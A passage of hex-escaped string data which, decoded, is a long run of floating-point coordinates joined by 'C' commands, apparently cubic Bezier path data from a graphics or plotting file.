\x39\x2e\x32\x36\x34\x33\x38\x31\x33\x35\x35\x38\x31\x20\x32\x2e\
\x39\x38\x35\x33\x30\x31\x32\x37\x30\x32\x34\x20\x39\x2e\x32\x38\
\x32\x39\x38\x30\x30\x36\x32\x33\x39\x20\x32\x2e\x39\x39\x31\x35\
\x34\x32\x33\x33\x39\x30\x37\x20\x39\x2e\x33\x30\x32\x33\x31\x30\
\x37\x31\x37\x34\x39\x20\x43\x20\x32\x2e\x39\x39\x37\x37\x38\x33\
\x34\x30\x37\x39\x31\x20\x39\x2e\x33\x32\x31\x36\x34\x31\x33\x37\
\x32\x36\x20\x33\x2e\x30\x30\x34\x30\x32\x34\x34\x37\x36\x37\x35\
\x20\x39\x2e\x33\x34\x31\x37\x30\x38\x33\x37\x38\x20\x33\x2e\x30\
\x31\x30\x32\x36\x35\x35\x34\x35\x35\x38\x20\x39\x2e\x33\x36\x32\
\x34\x39\x31\x38\x36\x38\x38\x31\x20\x43\x20\x33\x2e\x30\x31\x36\
\x35\x30\x36\x36\x31\x34\x34\x32\x20\x39\x2e\x33\x38\x33\x32\x37\
\x35\x33\x35\x39\x36\x32\x20\x33\x2e\x30\x32\x32\x37\x34\x37\x36\
\x38\x33\x32\x35\x20\x39\x2e\x34\x30\x34\x37\x37\x39\x36\x34\x34\
\x34\x38\x20\x33\x2e\x30\x32\x38\x39\x38\x38\x37\x35\x32\x30\x39\
\x20\x39\x2e\x34\x32\x36\x39\x38\x33\x38\x34\x34\x31\x20\x43\x20\
\x33\x2e\x30\x33\x35\x32\x32\x39\x38\x32\x30\x39\x33\x20\x39\x2e\
\x34\x34\x39\x31\x38\x38\x30\x34\x33\x37\x33\x20\x33\x2e\x30\x34\
\x31\x34\x37\x30\x38\x38\x39\x37\x36\x20\x39\x2e\x34\x37\x32\x30\
\x39\x36\x33\x36\x36\x39\x37\x20\x33\x2e\x30\x34\x37\x37\x31\x31\
\x39\x35\x38\x36\x20\x39\x2e\x34\x39\x35\x36\x38\x36\x39\x35\x32\
\x33\x39\x20\x43\x20\x33\x2e\x30\x35\x33\x39\x35\x33\x30\x32\x37\
\x34\x33\x20\x39\x2e\x35\x31\x39\x32\x37\x37\x35\x33\x37\x38\x32\
\x20\x33\x2e\x30\x36\x30\x31\x39\x34\x30\x39\x36\x32\x37\x20\x39\
\x2e\x35\x34\x33\x35\x35\x34\x34\x38\x37\x39\x39\x20\x33\x2e\x30\
\x36\x36\x34\x33\x35\x31\x36\x35\x31\x31\x20\x39\x2e\x35\x36\x38\
\x34\x39\x34\x39\x39\x33\x31\x36\x20\x43\x20\x33\x2e\x30\x37\x32\
\x36\x37\x36\x32\x33\x33\x39\x34\x20\x39\x2e\x35\x39\x33\x34\x33\
\x35\x34\x39\x38\x33\x32\x20\x33\x2e\x30\x37\x38\x39\x31\x37\x33\
\x30\x32\x37\x38\x20\x39\x2e\x36\x31\x39\x30\x34\x33\x35\x34\x38\
\x33\x39\x20\x33\x2e\x30\x38\x35\x31\x35\x38\x33\x37\x31\x36\x31\
\x20\x39\x2e\x36\x34\x35\x32\x39\x35\x34\x32\x30\x35\x32\x20\x43\
\x20\x33\x2e\x30\x39\x31\x33\x39\x39\x34\x34\x30\x34\x35\x20\x39\
\x2e\x36\x37\x31\x35\x34\x37\x32\x39\x32\x36\x35\x20\x33\x2e\x30\
\x39\x37\x36\x34\x30\x35\x30\x39\x32\x39\x20\x39\x2e\x36\x39\x38\
\x34\x34\x36\x38\x35\x37\x39\x37\x20\x33\x2e\x31\x30\x33\x38\x38\
\x31\x35\x37\x38\x31\x32\x20\x39\x2e\x37\x32\x35\x39\x36\x39\x35\
\x31\x37\x32\x32\x20\x43\x20\x33\x2e\x31\x31\x30\x31\x32\x32\x36\
\x34\x36\x39\x36\x20\x39\x2e\x37\x35\x33\x34\x39\x32\x31\x37\x36\
\x34\x37\x20\x33\x2e\x31\x31\x36\x33\x36\x33\x37\x31\x35\x37\x39\
\x20\x39\x2e\x37\x38\x31\x36\x34\x31\x36\x37\x35\x39\x39\x20\x33\
\x2e\x31\x32\x32\x36\x30\x34\x37\x38\x34\x36\x33\x20\x39\x2e\x38\
\x31\x30\x33\x39\x32\x35\x37\x38\x31\x33\x20\x43\x20\x33\x2e\x31\
\x32\x38\x38\x34\x35\x38\x35\x33\x34\x37\x20\x39\x2e\x38\x33\x39\
\x31\x34\x33\x34\x38\x30\x32\x37\x20\x33\x2e\x31\x33\x35\x30\x38\
\x36\x39\x32\x32\x33\x20\x39\x2e\x38\x36\x38\x34\x39\x39\x34\x30\
\x30\x37\x39\x20\x33\x2e\x31\x34\x31\x33\x32\x37\x39\x39\x31\x31\
\x34\x20\x39\x2e\x38\x39\x38\x34\x33\x34\x31\x30\x32\x39\x39\x20\
\x43\x20\x33\x2e\x31\x34\x37\x35\x36\x39\x30\x35\x39\x39\x37\x20\
\x39\x2e\x39\x32\x38\x33\x36\x38\x38\x30\x35\x31\x39\x20\x33\x2e\
\x31\x35\x33\x38\x31\x30\x31\x32\x38\x38\x31\x20\x39\x2e\x39\x35\
\x38\x38\x38\x35\x37\x36\x38\x36\x36\x20\x33\x2e\x31\x36\x30\x30\
\x35\x31\x31\x39\x37\x36\x35\x20\x39\x2e\x39\x38\x39\x39\x35\x37\
\x39\x39\x38\x31\x38\x20\x43\x20\x33\x2e\x31\x36\x36\x32\x39\x32\
\x32\x36\x36\x34\x38\x20\x31\x30\x2e\x30\x32\x31\x30\x33\x30\x32\
\x32\x37\x37\x20\x33\x2e\x31\x37\x32\x35\x33\x33\x33\x33\x35\x33\
\x32\x20\x31\x30\x2e\x30\x35\x32\x36\x36\x31\x30\x36\x31\x33\x20\
\x33\x2e\x31\x37\x38\x37\x37\x34\x34\x30\x34\x31\x36\x20\x31\x30\
\x2e\x30\x38\x34\x38\x32\x32\x37\x38\x37\x31\x20\x43\x20\x33\x2e\
\x31\x38\x35\x30\x31\x35\x34\x37\x32\x39\x39\x20\x31\x30\x2e\x31\
\x31\x36\x39\x38\x34\x35\x31\x32\x38\x20\x33\x2e\x31\x39\x31\x32\
\x35\x36\x35\x34\x31\x38\x33\x20\x31\x30\x2e\x31\x34\x39\x36\x38\
\x30\x33\x32\x32\x20\x33\x2e\x31\x39\x37\x34\x39\x37\x36\x31\x30\
\x36\x36\x20\x31\x30\x2e\x31\x38\x32\x38\x38\x31\x38\x32\x38\x37\
\x20\x43\x20\x33\x2e\x32\x30\x33\x37\x33\x38\x36\x37\x39\x35\x20\
\x31\x30\x2e\x32\x31\x36\x30\x38\x33\x33\x33\x35\x34\x20\x33\x2e\
\x32\x30\x39\x39\x37\x39\x37\x34\x38\x33\x34\x20\x31\x30\x2e\x32\
\x34\x39\x37\x39\x33\x35\x37\x39\x33\x20\x33\x2e\x32\x31\x36\x32\
\x32\x30\x38\x31\x37\x31\x37\x20\x31\x30\x2e\x32\x38\x33\x39\x38\
\x33\x35\x34\x34\x34\x20\x43\x20\x33\x2e\x32\x32\x32\x34\x36\x31\
\x38\x38\x36\x30\x31\x20\x31\x30\x2e\x33\x31\x38\x31\x37\x33\x35\
\x30\x39\x36\x20\x33\x2e\x32\x32\x38\x37\x30\x32\x39\x35\x34\x38\
\x34\x20\x31\x30\x2e\x33\x35\x32\x38\x34\x36\x30\x37\x39\x33\x20\
\x33\x2e\x32\x33\x34\x39\x34\x34\x30\x32\x33\x36\x38\x20\x31\x30\
\x2e\x33\x38\x37\x39\x37\x31\x36\x35\x32\x34\x20\x43\x20\x33\x2e\
\x32\x34\x31\x31\x38\x35\x30\x39\x32\x35\x32\x20\x31\x30\x2e\x34\
\x32\x33\x30\x39\x37\x32\x32\x35\x35\x20\x33\x2e\x32\x34\x37\x34\
\x32\x36\x31\x36\x31\x33\x35\x20\x31\x30\x2e\x34\x35\x38\x36\x37\
\x38\x35\x32\x34\x36\x20\x33\x2e\x32\x35\x33\x36\x36\x37\x32\x33\
\x30\x31\x39\x20\x31\x30\x2e\x34\x39\x34\x36\x38\x35\x34\x30\x38\
\x39\x20\x43\x20\x33\x2e\x32\x35\x39\x39\x30\x38\x32\x39\x39\x30\
\x32\x20\x31\x30\x2e\x35\x33\x30\x36\x39\x32\x32\x39\x33\x33\x20\
\x33\x2e\x32\x36\x36\x31\x34\x39\x33\x36\x37\x38\x36\x20\x31\x30\
\x2e\x35\x36\x37\x31\x32\x37\x33\x32\x30\x34\x20\x33\x2e\x32\x37\
\x32\x33\x39\x30\x34\x33\x36\x37\x20\x31\x30\x2e\x36\x30\x33\x39\
\x35\x39\x38\x35\x37\x20\x43\x20\x33\x2e\x32\x37\x38\x36\x33\x31\
\x35\x30\x35\x35\x33\x20\x31\x30\x2e\x36\x34\x30\x37\x39\x32\x33\
\x39\x33\x35\x20\x33\x2e\x32\x38\x34\x38\x37\x32\x35\x37\x34\x33\
\x37\x20\x31\x30\x2e\x36\x37\x38\x30\x32\x34\x38\x32\x38\x20\x33\
\x2e\x32\x39\x31\x31\x31\x33\x36\x34\x33\x32\x20\x31\x30\x2e\x37\
\x31\x35\x36\x32\x36\x30\x38\x31\x34\x20\x43\x20\x33\x2e\x32\x39\
\x37\x33\x35\x34\x37\x31\x32\x30\x34\x20\x31\x30\x2e\x37\x35\x33\
\x32\x32\x37\x33\x33\x34\x38\x20\x33\x2e\x33\x30\x33\x35\x39\x35\
\x37\x38\x30\x38\x38\x20\x31\x30\x2e\x37\x39\x31\x31\x39\x39\x36\
\x32\x33\x20\x33\x2e\x33\x30\x39\x38\x33\x36\x38\x34\x39\x37\x31\
\x20\x31\x30\x2e\x38\x32\x39\x35\x31\x31\x34\x36\x39\x37\x20\x43\
\x20\x33\x2e\x33\x31\x36\x30\x37\x37\x39\x31\x38\x35\x35\x20\x31\
\x30\x2e\x38\x36\x37\x38\x32\x33\x33\x31\x36\x33\x20\x33\x2e\x33\
\x32\x32\x33\x31\x38\x39\x38\x37\x33\x38\x20\x31\x30\x2e\x39\x30\
\x36\x34\x37\x36\x37\x36\x31\x32\x20\x33\x2e\x33\x32\x38\x35\x36\
\x30\x30\x35\x36\x32\x32\x20\x31\x30\x2e\x39\x34\x35\x34\x33\x39\
\x39\x37\x39\x31\x20\x43\x20\x33\x2e\x33\x33\x34\x38\x30\x31\x31\
\x32\x35\x30\x36\x20\x31\x30\x2e\x39\x38\x34\x34\x30\x33\x31\x39\
\x36\x39\x20\x33\x2e\x33\x34\x31\x30\x34\x32\x31\x39\x33\x38\x39\
\x20\x31\x31\x2e\x30\x32\x33\x36\x37\x38\x30\x34\x38\x34\x20\x33\
\x2e\x33\x34\x37\x32\x38\x33\x32\x36\x32\x37\x33\x20\x31\x31\x2e\
\x30\x36\x33\x32\x33\x32\x34\x30\x38\x35\x20\x43\x20\x33\x2e\x33\
\x35\x33\x35\x32\x34\x33\x33\x31\x35\x36\x20\x31\x31\x2e\x31\x30\
\x32\x37\x38\x36\x37\x36\x38\x37\x20\x33\x2e\x33\x35\x39\x37\x36\
\x35\x34\x30\x30\x34\x20\x31\x31\x2e\x31\x34\x32\x36\x32\x32\x33\
\x31\x36\x31\x20\x33\x2e\x33\x36\x36\x30\x30\x36\x34\x36\x39\x32\
\x34\x20\x31\x31\x2e\x31\x38\x32\x37\x30\x36\x36\x37\x35\x38\x20\
\x43\x20\x33\x2e\x33\x37\x32\x32\x34\x37\x35\x33\x38\x30\x37\x20\
\x31\x31\x2e\x32\x32\x32\x37\x39\x31\x30\x33\x35\x36\x20\x33\x2e\
\x33\x37\x38\x34\x38\x38\x36\x30\x36\x39\x31\x20\x31\x31\x2e\x32\
\x36\x33\x31\x32\x35\x37\x30\x31\x35\x20\x33\x2e\x33\x38\x34\x37\
\x32\x39\x36\x37\x35\x37\x34\x20\x31\x31\x2e\x33\x30\x33\x36\x37\
\x38\x30\x39\x38\x39\x20\x43\x20\x33\x2e\x33\x39\x30\x39\x37\x30\
\x37\x34\x34\x35\x38\x20\x31\x31\x2e\x33\x34\x34\x32\x33\x30\x34\
\x39\x36\x33\x20\x33\x2e\x33\x39\x37\x32\x31\x31\x38\x31\x33\x34\
\x32\x20\x31\x31\x2e\x33\x38\x35\x30\x30\x31\x39\x33\x32\x20\x33\
\x2e\x34\x30\x33\x34\x35\x32\x38\x38\x32\x32\x35\x20\x31\x31\x2e\
\x34\x32\x35\x39\x35\x39\x36\x38\x31\x35\x20\x43\x20\x33\x2e\x34\
\x30\x39\x36\x39\x33\x39\x35\x31\x30\x39\x20\x31\x31\x2e\x34\x36\
\x36\x39\x31\x37\x34\x33\x31\x31\x20\x33\x2e\x34\x31\x35\x39\x33\
\x35\x30\x31\x39\x39\x32\x20\x31\x31\x2e\x35\x30\x38\x30\x36\x32\
\x36\x31\x32\x34\x20\x33\x2e\x34\x32\x32\x31\x37\x36\x30\x38\x38\
\x37\x36\x20\x31\x31\x2e\x35\x34\x39\x33\x36\x32\x34\x30\x32\x31\
\x20\x43\x20\x33\x2e\x34\x32\x38\x34\x31\x37\x31\x35\x37\x36\x20\
\x31\x31\x2e\x35\x39\x30\x36\x36\x32\x31\x39\x31\x38\x20\x33\x2e\
\x34\x33\x34\x36\x35\x38\x32\x32\x36\x34\x33\x20\x31\x31\x2e\x36\
\x33\x32\x31\x31\x37\x35\x31\x37\x20\x33\x2e\x34\x34\x30\x38\x39\
\x39\x32\x39\x35\x32\x37\x20\x31\x31\x2e\x36\x37\x33\x36\x39\x35\
\x35\x30\x36\x31\x20\x43\x20\x33\x2e\x34\x34\x37\x31\x34\x30\x33\
\x36\x34\x31\x31\x20\x31\x31\x2e\x37\x31\x35\x32\x37\x33\x34\x39\
\x35\x32\x20\x33\x2e\x34\x35\x33\x33\x38\x31\x34\x33\x32\x39\x34\
\x20\x31\x31\x2e\x37\x35\x36\x39\x37\x34\x38\x38\x33\x20\x33\x2e\
\x34\x35\x39\x36\x32\x32\x35\x30\x31\x37\x38\x20\x31\x31\x2e\x37\
\x39\x38\x37\x36\x36\x38\x30\x30\x37\x20\x43\x20\x33\x2e\x34\x36\
\x35\x38\x36\x33\x35\x37\x30\x36\x31\x20\x31\x31\x2e\x38\x34\x30\
\x35\x35\x38\x37\x31\x38\x34\x20\x33\x2e\x34\x37\x32\x31\x30\x34\
\x36\x33\x39\x34\x35\x20\x31\x31\x2e\x38\x38\x32\x34\x34\x31\x37\
\x30\x37\x34\x20\x33\x2e\x34\x37\x38\x33\x34\x35\x37\x30\x38\x32\
\x39\x20\x31\x31\x2e\x39\x32\x34\x33\x38\x32\x39\x35\x32\x31\x20\
\x43\x20\x33\x2e\x34\x38\x34\x35\x38\x36\x37\x37\x37\x31\x32\x20\
\x31\x31\x2e\x39\x36\x36\x33\x32\x34\x31\x39\x36\x39\x20\x33\x2e\
\x34\x39\x30\x38\x32\x37\x38\x34\x35\x39\x36\x20\x31\x32\x2e\x30\
\x30\x38\x33\x32\x34\x30\x34\x34\x37\x20\x33\x2e\x34\x39\x37\x30\
\x36\x38\x39\x31\x34\x37\x39\x20\x31\x32\x2e\x30\x35\x30\x33\x34\
\x39\x37\x38\x34\x32\x20\x43\x20\x33\x2e\x35\x30\x33\x33\x30\x39\
\x39\x38\x33\x36\x33\x20\x31\x32\x2e\x30\x39\x32\x33\x37\x35\x35\
\x32\x33\x38\x20\x33\x2e\x35\x30\x39\x35\x35\x31\x30\x35\x32\x34\
\x37\x20\x31\x32\x2e\x31\x33\x34\x34\x32\x37\x33\x30\x37\x36\x20\
\x33\x2e\x35\x31\x35\x37\x39\x32\x31\x32\x31\x33\x20\x31\x32\x2e\
\x31\x37\x36\x34\x37\x32\x35\x37\x38\x39\x20\x43\x20\x33\x2e\x35\
\x32\x32\x30\x33\x33\x31\x39\x30\x31\x34\x20\x31\x32\x2e\x32\x31\
\x38\x35\x31\x37\x38\x35\x30\x33\x20\x33\x2e\x35\x32\x38\x32\x37\
\x34\x32\x35\x38\x39\x37\x20\x31\x32\x2e\x32\x36\x30\x35\x35\x36\
\x35\x36\x36\x39\x20\x33\x2e\x35\x33\x34\x35\x31\x35\x33\x32\x37\
\x38\x31\x20\x31\x32\x2e\x33\x30\x32\x35\x35\x36\x33\x37\x37\x20\
\x43\x20\x33\x2e\x35\x34\x30\x37\x35\x36\x33\x39\x36\x36\x35\x20\
\x31\x32\x2e\x33\x34\x34\x35\x35\x36\x31\x38\x37\x20\x33\x2e\x35\
\x34\x36\x39\x39\x37\x34\x36\x35\x34\x38\x20\x31\x32\x2e\x33\x38\
\x36\x35\x31\x36\x38\x35\x33\x34\x20\x33\x2e\x35\x35\x33\x32\x33\
\x38\x35\x33\x34\x33\x32\x20\x31\x32\x2e\x34\x32\x38\x34\x30\x36\
\x32\x37\x39\x34\x20\x43\x20\x33\x2e\x35\x35\x39\x34\x37\x39\x36\
\x30\x33\x31\x35\x20\x31\x32\x2e\x34\x37\x30\x32\x39\x35\x37\x30\
\x35\x33\x20\x33\x2e\x35\x36\x35\x37\x32\x30\x36\x37\x31\x39\x39\
\x20\x31\x32\x2e\x35\x31\x32\x31\x31\x33\x34\x35\x39\x31\x20\x33\
\x2e\x35\x37\x31\x39\x36\x31\x37\x34\x30\x38\x33\x20\x31\x32\x2e\
\x35\x35\x33\x38\x32\x37\x37\x34\x38\x37\x20\x43\x20\x33\x2e\x35\
\x37\x38\x32\x30\x32\x38\x30\x39\x36\x36\x20\x31\x32\x2e\x35\x39\
\x35\x35\x34\x32\x30\x33\x38\x33\x20\x33\x2e\x35\x38\x34\x34\x34\
\x33\x38\x37\x38\x35\x20\x31\x32\x2e\x36\x33\x37\x31\x35\x32\x32\
\x33\x38\x32\x20\x33\x2e\x35\x39\x30\x36\x38\x34\x39\x34\x37\x33\
\x33\x20\x31\x32\x2e\x36\x37\x38\x36\x32\x36\x39\x30\x39\x39\x20\
\x43\x20\x33\x2e\x35\x39\x36\x39\x32\x36\x30\x31\x36\x31\x37\x20\
\x31\x32\x2e\x37\x32\x30\x31\x30\x31\x35\x38\x31\x37\x20\x33\x2e\
\x36\x30\x33\x31\x36\x37\x30\x38\x35\x30\x31\x20\x31\x32\x2e\x37\
\x36\x31\x34\x33\x39\x39\x30\x37\x20\x33\x2e\x36\x30\x39\x34\x30\
\x38\x31\x35\x33\x38\x34\x20\x31\x32\x2e\x38\x30\x32\x36\x31\x30\
\x38\x34\x39\x38\x20\x43\x20\x33\x2e\x36\x31\x35\x36\x34\x39\x32\
\x32\x32\x36\x38\x20\x31\x32\x2e\x38\x34\x33\x37\x38\x31\x37\x39\
\x32\x36\x20\x33\x2e\x36\x32\x31\x38\x39\x30\x32\x39\x31\x35\x31\
\x20\x31\x32\x2e\x38\x38\x34\x37\x38\x34\x33\x34\x33\x20\x33\x2e\
\x36\x32\x38\x31\x33\x31\x33\x36\x30\x33\x35\x20\x31\x32\x2e\x39\
\x32\x35\x35\x38\x37\x39\x31\x35\x32\x20\x43\x20\x33\x2e\x36\x33\
\x34\x33\x37\x32\x34\x32\x39\x31\x39\x20\x31\x32\x2e\x39\x36\x36\
\x33\x39\x31\x34\x38\x37\x35\x20\x33\x2e\x36\x34\x30\x36\x31\x33\
\x34\x39\x38\x30\x32\x20\x31\x33\x2e\x30\x30\x36\x39\x39\x34\x38\
\x38\x31\x37\x20\x33\x2e\x36\x34\x36\x38\x35\x34\x35\x36\x36\x38\
\x36\x20\x31\x33\x2e\x30\x34\x37\x33\x36\x38\x30\x30\x39\x37\x20\
\x43\x20\x33\x2e\x36\x35\x33\x30\x39\x35\x36\x33\x35\x36\x39\x20\
\x31\x33\x2e\x30\x38\x37\x37\x34\x31\x31\x33\x37\x38\x20\x33\x2e\
\x36\x35\x39\x33\x33\x36\x37\x30\x34\x35\x33\x20\x31\x33\x2e\x31\
\x32\x37\x38\x38\x32\x36\x31\x31\x35\x20\x33\x2e\x36\x36\x35\x35\
\x37\x37\x37\x37\x33\x33\x37\x20\x31\x33\x2e\x31\x36\x37\x37\x36\
\x32\x38\x38\x36\x39\x20\x43\x20\x33\x2e\x36\x37\x31\x38\x31\x38\
\x38\x34\x32\x32\x20\x31\x33\x2e\x32\x30\x37\x36\x34\x33\x31\x36\
\x32\x34\x20\x33\x2e\x36\x37\x38\x30\x35\x39\x39\x31\x31\x30\x34\
\x20\x31\x33\x2e\x32\x34\x37\x32\x36\x30\x36\x36\x35\x33\x20\x33\
\x2e\x36\x38\x34\x33\x30\x30\x39\x37\x39\x38\x37\x20\x31\x33\x2e\
\x32\x38\x36\x35\x38\x36\x34\x34\x31\x37\x20\x43\x20\x33\x2e\x36\
\x39\x30\x35\x34\x32\x30\x34\x38\x37\x31\x20\x31\x33\x2e\x33\x32\
\x35\x39\x31\x32\x32\x31\x38\x31\x20\x33\x2e\x36\x39\x36\x37\x38\
\x33\x31\x31\x37\x35\x35\x20\x31\x33\x2e\x33\x36\x34\x39\x34\x34\
\x35\x31\x20\x33\x2e\x37\x30\x33\x30\x32\x34\x31\x38\x36\x33\x38\
\x20\x31\x33\x2e\x34\x30\x33\x36\x35\x34\x39\x39\x37\x39\x20\x43\
\x20\x33\x2e\x37\x30\x39\x32\x36\x35\x32\x35\x35\x32\x32\x20\x31\
\x33\x2e\x34\x34\x32\x33\x36\x35\x34\x38\x35\x38\x20\x33\x2e\x37\
\x31\x35\x35\x30\x36\x33\x32\x34\x30\x36\x20\x31\x33\x2e\x34\x38\
\x30\x37\x35\x32\x32\x33\x31\x20\x33\x2e\x37\x32\x31\x37\x34\x37\
\x33\x39\x32\x38\x39\x20\x31\x33\x2e\x35\x31\x38\x37\x38\x37\x35\
\x39\x32\x33\x20\x43\x20\x33\x2e\x37\x32\x37\x39\x38\x38\x34\x36\
\x31\x37\x33\x20\x31\x33\x2e\x35\x35\x36\x38\x32\x32\x39\x35\x33\
\x35\x20\x33\x2e\x37\x33\x34\x32\x32\x39\x35\x33\x30\x35\x36\x20\
\x31\x33\x2e\x35\x39\x34\x35\x30\x34\x38\x31\x34\x32\x20\x33\x2e\
\x37\x34\x30\x34\x37\x30\x35\x39\x39\x34\x20\x31\x33\x2e\x36\x33\
\x31\x38\x30\x36\x32\x35\x34\x31\x20\x43\x20\x33\x2e\x37\x34\x36\
\x37\x31\x31\x36\x36\x38\x32\x34\x20\x31\x33\x2e\x36\x36\x39\x31\
\x30\x37\x36\x39\x34\x20\x33\x2e\x37\x35\x32\x39\x35\x32\x37\x33\
\x37\x30\x37\x20\x31\x33\x2e\x37\x30\x36\x30\x32\x36\x34\x32\x31\
\x39\x20\x33\x2e\x37\x35\x39\x31\x39\x33\x38\x30\x35\x39\x31\x20\
\x31\x33\x2e\x37\x34\x32\x35\x33\x36\x32\x38\x30\x33\x20\x43\x20\
\x33\x2e\x37\x36\x35\x34\x33\x34\x38\x37\x34\x37\x34\x20\x31\x33\
\x2e\x37\x37\x39\x30\x34\x36\x31\x33\x38\x37\x20\x33\x2e\x37\x37\
\x31\x36\x37\x35\x39\x34\x33\x35\x38\x20\x31\x33\x2e\x38\x31\x35\
\x31\x34\x34\x36\x36\x35\x33\x20\x33\x2e\x37\x37\x37\x39\x31\x37\
\x30\x31\x32\x34\x32\x20\x31\x33\x2e\x38\x35\x30\x38\x30\x36\x35\
\x30\x35\x37\x20\x43\x20\x33\x2e\x37\x38\x34\x31\x35\x38\x30\x38\
\x31\x32\x35\x20\x31\x33\x2e\x38\x38\x36\x34\x36\x38\x33\x34\x36\
\x31\x20\x33\x2e\x37\x39\x30\x33\x39\x39\x31\x35\x30\x30\x39\x20\
\x31\x33\x2e\x39\x32\x31\x36\x39\x30\x38\x37\x30\x37\x20\x33\x2e\
\x37\x39\x36\x36\x34\x30\x32\x31\x38\x39\x32\x20\x31\x33\x2e\x39\
\x35\x36\x34\x34\x39\x35\x36\x37\x33\x20\x43\x20\x33\x2e\x38\x30\
\x32\x38\x38\x31\x32\x38\x37\x37\x36\x20\x31\x33\x2e\x39\x39\x31\
\x32\x30\x38\x32\x36\x34\x20\x33\x2e\x38\x30\x39\x31\x32\x32\x33\
\x35\x36\x36\x20\x31\x34\x2e\x30\x32\x35\x35\x30\x30\x33\x33\x39\
\x39\x20\x33\x2e\x38\x31\x35\x33\x36\x33\x34\x32\x35\x34\x33\x20\
\x31\x34\x2e\x30\x35\x39\x33\x30\x32\x31\x36\x33\x33\x20\x43\x20\
\x33\x2e\x38\x32\x31\x36\x30\x34\x34\x39\x34\x32\x37\x20\x31\x34\
\x2e\x30\x39\x33\x31\x30\x33\x39\x38\x36\x36\x20\x33\x2e\x38\x32\
\x37\x38\x34\x35\x35\x36\x33\x31\x20\x31\x34\x2e\x31\x32\x36\x34\
\x31\x32\x36\x30\x35\x36\x20\x33\x2e\x38\x33\x34\x30\x38\x36\x36\
\x33\x31\x39\x34\x20\x31\x34\x2e\x31\x35\x39\x32\x30\x35\x33\x30\
\x35\x32\x20\x43\x20\x33\x2e\x38\x34\x30\x33\x32\x37\x37\x30\x30\
\x37\x38\x20\x31\x34\x2e\x31\x39\x31\x39\x39\x38\x30\x30\x34\x37\
\x20\x33\x2e\x38\x34\x36\x35\x36\x38\x37\x36\x39\x36\x31\x20\x31\
\x34\x2e\x32\x32\x34\x32\x37\x31\x36\x37\x38\x37\x20\x33\x2e\x38\
\x35\x32\x38\x30\x39\x38\x33\x38\x34\x35\x20\x31\x34\x2e\x32\x35\
\x36\x30\x30\x34\x35\x36\x33\x38\x20\x43\x20\x33\x2e\x38\x35\x39\
\x30\x35\x30\x39\x30\x37\x32\x38\x20\x31\x34\x2e\x32\x38\x37\x37\
\x33\x37\x34\x34\x38\x39\x20\x33\x2e\x38\x36\x35\x32\x39\x31\x39\
\x37\x36\x31\x32\x20\x31\x34\x2e\x33\x31\x38\x39\x32\x36\x32\x38\
\x39\x36\x20\x33\x2e\x38\x37\x31\x35\x33\x33\x30\x34\x34\x39\x36\
\x20\x31\x34\x2e\x33\x34\x39\x35\x35\x30\x33\x30\x37\x39\x20\x43\
\x20\x33\x2e\x38\x37\x37\x37\x37\x34\x31\x31\x33\x37\x39\x20\x31\
\x34\x2e\x33\x38\x30\x31\x37\x34\x33\x32\x36\x32\x20\x33\x2e\x38\
\x38\x34\x30\x31\x35\x31\x38\x32\x36\x33\x20\x31\x34\x2e\x34\x31\
\x30\x32\x33\x30\x31\x32\x32\x32\x20\x33\x2e\x38\x39\x30\x32\x35\
\x36\x32\x35\x31\x34\x36\x20\x31\x34\x2e\x34\x33\x39\x36\x39\x37\
\x39\x33\x35\x35\x20\x43\x20\x33\x2e\x38\x39\x36\x34\x39\x37\x33\
\x32\x30\x33\x20\x31\x34\x2e\x34\x36\x39\x31\x36\x35\x37\x34\x38\
\x38\x20\x33\x2e\x39\x30\x32\x37\x33\x38\x33\x38\x39\x31\x34\x20\
\x31\x34\x2e\x34\x39\x38\x30\x34\x32\x30\x34\x30\x32\x20\x33\x2e\
\x39\x30\x38\x39\x37\x39\x34\x35\x37\x39\x37\x20\x31\x34\x2e\x35\
\x32\x36\x33\x30\x38\x30\x39\x37\x34\x20\x43\x20\x33\x2e\x39\x31\
\x35\x32\x32\x30\x35\x32\x36\x38\x31\x20\x31\x34\x2e\x35\x35\x34\
\x35\x37\x34\x31\x35\x34\x37\x20\x33\x2e\x39\x32\x31\x34\x36\x31\
\x35\x39\x35\x36\x34\x20\x31\x34\x2e\x35\x38\x32\x32\x32\x36\x33\
\x30\x34\x37\x20\x33\x2e\x39\x32\x37\x37\x30\x32\x36\x36\x34\x34\
\x38\x20\x31\x34\x2e\x36\x30\x39\x32\x34\x36\x39\x31\x32\x36\x20\
\x43\x20\x33\x2e\x39\x33\x33\x39\x34\x33\x37\x33\x33\x33\x32\x20\
\x31\x34\x2e\x36\x33\x36\x32\x36\x37\x35\x32\x30\x34\x20\x33\x2e\
\x39\x34\x30\x31\x38\x34\x38\x30\x32\x31\x35\x20\x31\x34\x2e\x36\
\x36\x32\x36\x35\x32\x37\x38\x34\x38\x20\x33\x2e\x39\x34\x36\x34\
\x32\x35\x38\x37\x30\x39\x39\x20\x31\x34\x2e\x36\x38\x38\x33\x38\
\x36\x31\x37\x35\x31\x20\x43\x20\x33\x2e\x39\x35\x32\x36\x36\x36\
\x39\x33\x39\x38\x32\x20\x31\x34\x2e\x37\x31\x34\x31\x31\x39\x35\
\x36\x35\x33\x20\x33\x2e\x39\x35\x38\x39\x30\x38\x30\x30\x38\x36\
\x36\x20\x31\x34\x2e\x37\x33\x39\x31\x39\x37\x31\x35\x38\x20\x33\
\x2e\x39\x36\x35\x31\x34\x39\x30\x37\x37\x35\x20\x31\x34\x2e\x37\
\x36\x33\x36\x30\x33\x35\x35\x32\x33\x20\x43\x20\x33\x2e\x39\x37\
\x31\x33\x39\x30\x31\x34\x36\x33\x33\x20\x31\x34\x2e\x37\x38\x38\
\x30\x30\x39\x39\x34\x36\x35\x20\x33\x2e\x39\x37\x37\x36\x33\x31\
\x32\x31\x35\x31\x37\x20\x31\x34\x2e\x38\x31\x31\x37\x34\x31\x31\
\x30\x32\x38\x20\x33\x2e\x39\x38\x33\x38\x37\x32\x32\x38\x34\x30\
\x31\x20\x31\x34\x2e\x38\x33\x34\x37\x38\x32\x37\x37\x34\x20\x43\
\x20\x33\x2e\x39\x39\x30\x31\x31\x33\x33\x35\x32\x38\x34\x20\x31\
\x34\x2e\x38\x35\x37\x38\x32\x34\x34\x34\x35\x32\x20\x33\x2e\x39\
\x39\x36\x33\x35\x34\x34\x32\x31\x36\x38\x20\x31\x34\x2e\x38\x38\
\x30\x31\x37\x32\x34\x38\x31\x37\x20\x34\x2e\x30\x30\x32\x35\x39\
\x35\x34\x39\x30\x35\x31\x20\x31\x34\x2e\x39\x30\x31\x38\x31\x33\
\x38\x31\x32\x32\x20\x43\x20\x34\x2e\x30\x30\x38\x38\x33\x36\x35\
